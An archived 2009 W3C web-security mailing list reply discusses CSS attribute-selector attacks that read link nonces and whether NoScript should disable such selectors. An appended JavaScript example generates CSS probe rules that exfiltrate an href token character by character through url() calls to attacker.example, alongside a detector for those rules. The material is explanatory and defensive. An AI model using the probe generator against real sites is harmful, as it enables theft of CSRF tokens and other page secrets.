- From: Adam Barth <w3c@adambarth.com>
- Date: Tue, 8 Dec 2009 01:40:59 -0800
- To: "sird@rckc.at" <sird@rckc.at>
- Cc: gaz Heyes <gazheyes@gmail.com>, Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
On Tue, Dec 8, 2009 at 1:37 AM, sird@rckc.at <sird@rckc.at> wrote:
> Reading links wouldn't be protected by Gareth's solution (nonces on links, for
> example, and other potentially sensitive information..).

That's a good example, thanks.

> Btw, I think NoScript will start protecting its users against this attack
> in the near future (kudos to Giorgio).. it's a bit complicated because of
> @charset rules and UTF BOMs.. but it's probably gonna work.. he is going to
> disable attribute selectors (*=, ^=, $=) in some cases.. I'm not aware of
> the details yet.. but I think that's great news!!

Does Giorgio have a way to measure how commonly he blocks these things?
That would be useful information for evaluating the costs of disabling
attribute selectors entirely. Before Daniel jumps all over me, I'll say
that it's a data point that's worth knowing in balancing the security
costs of a feature with its benefits.

Adam
Received on Tuesday, 8 December 2009 09:41:52 UTC
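The attack the thread is discussing, and the kind of check NoScript-style blocking would have to perform, as an added example that is not part of the original message and not Giorgio's or Gareth's code. It shows how substring attribute selectors (`^=`, `$=`, `*=`) combined with a `url()` declaration probe an attribute such as a nonce in an `href` one character at a time, and a detector that flags exactly those rules after stripping the BOM and `@charset` line mentioned above. The collector host, the `csrf=` prefix and the sample stylesheet are constructed for the example.

```javascript
// Added example, not code from the thread. All names and the sample
// stylesheet below are hypothetical.

const SUBSTRING_OPS = new Set(['^=', '$=', '*=']);

// Attacker side: for a known prefix of an attribute value, emit one rule per
// candidate next character. Only the rule whose prefix matches the real value
// applies, so the resulting request to the collector reveals that character.
function probeRules(attr, knownPrefix, alphabet, collector) {
  return [...alphabet].map((ch) => {
    const guess = knownPrefix + ch;
    return `a[${attr}^="${guess}"]{background:url(${collector}?p=${encodeURIComponent(guess)})}`;
  }).join('\n');
}

// Defender side: normalise the sheet (UTF-8 BOM, comments, @charset/@import),
// then flag every flat rule that pairs a substring attribute selector with a
// declaration that triggers a request. Nested at-rules (@media) are not walked.
function findLeakingAttributeSelectors(cssText) {
  const css = cssText
    .replace(/^\uFEFF/, '')
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/@(charset|import)[^;]*;/g, '');
  const findings = [];
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  const attrRe = /\[\s*([\w-]+)\s*([*^$|~]?=)\s*(?:"([^"]*)"|'([^']*)'|([^\]\s]+))\s*\]/g;
  let rule;
  while ((rule = ruleRe.exec(css)) !== null) {
    const selector = rule[1].trim();
    const urlMatch = rule[2].match(/url\(\s*['"]?([^'")]+)['"]?\s*\)/i);
    if (!urlMatch) continue; // no request, nothing can leak
    let a;
    while ((a = attrRe.exec(selector)) !== null) {
      if (!SUBSTRING_OPS.has(a[2])) continue; // exact match (=) is not a probe
      findings.push({
        selector,
        attribute: a[1],
        op: a[2],
        value: a[3] ?? a[4] ?? a[5],
        url: urlMatch[1],
      });
    }
  }
  return findings;
}

// Constructed sample: a BOM, a @charset line, one benign attribute selector,
// three probing rules for a hypothetical "csrf=" token prefix, and a benign
// exact-match selector.
function sampleStylesheet() {
  return '\uFEFF@charset "UTF-8";\n' +
    '/* benign: no request is triggered */\n' +
    'a[href$=".pdf"] { color: red }\n' +
    probeRules('href', 'csrf=', 'abc', 'https://attacker.example/c') + '\n' +
    'input[type="hidden"] { display: none }\n';
}

console.log(findLeakingAttributeSelectors(sampleStylesheet()));
```

The detector deliberately keys on the pair (substring operator, `url()`), not on the operator alone, which is the measurement Adam asks about: counting how many rules on real pages fall into that pair, versus how many use `^=`/`$=`/`*=` at all, is what tells you the cost of disabling the selectors outright.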